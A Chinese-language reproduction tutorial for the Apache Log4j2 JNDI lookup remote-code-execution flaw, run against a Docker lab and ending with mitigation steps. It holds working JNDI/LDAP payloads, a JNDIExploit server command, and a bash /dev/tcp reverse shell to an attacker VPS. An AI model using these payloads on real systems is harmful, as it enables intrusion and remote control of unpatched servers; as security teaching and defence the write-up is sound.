漏洞描述:
Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。
影响范围:
Apache Log4j 2.x < 2.15.0-rc2
漏洞复现
1.环境搭建:
用的是github上的一个docker环境:log4j_vuln
1.1 拉取漏洞环境镜像
docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
1.2 运行漏洞环境容器
docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cnhangzhou.aliyuncs.com/fengxuan/log4j_vuln
1.3 进入容器中
docker exec -it log4j_vuln_container /bin/bash
1.4 启动漏洞环境
/bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh
打开http://192.168.1.78:8080/webstudy/hello-fengxuan 出现以下页面,说明搭建成功。
2.dnslog执行代码
构造payload,POST提交,参数如下
c=${jndi:ldap://log4j2.xxxxxx.dnslog.cn}
c=${jndi:rmi://log4j2.xxxxxx.dnslog.cn}
3.执行命令
在本地先要生成JNDI链接并启动后端相关服务,VPS注意防火墙开启相关端口,用的是JNDIExploit-1.2-SNAPSHOT.jar,同样本地先启动服务
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.1.78 -l 888 -p 80
构造以下payload,发送请求,成功执行命令。
cmd: whoami
c=${jndi:ldap://47.xxx.xxx.xxx:888/TomcatBypass/TomcatEcho}
4.反弹shell
构造以下payload,反弹shell
cmd: bash -i >& /dev/tcp/47.xxx.xxx.xxx/5555 0>&1
c=${jndi:ldap://47.xxx.xxx.xxx:9999/TomcatBypass/TomcatEcho}
VPS服务器监听444端口,成功反弹shell。
其他测试靶场
修复方案
截止到目前,网上的修复方法大致是这些:
补丁链接: log4j-2.15.0-rc2
1.添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true;
2.在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true;
3.JDK使用11.0.1、8u191、7u201、6u211及以上的高版本。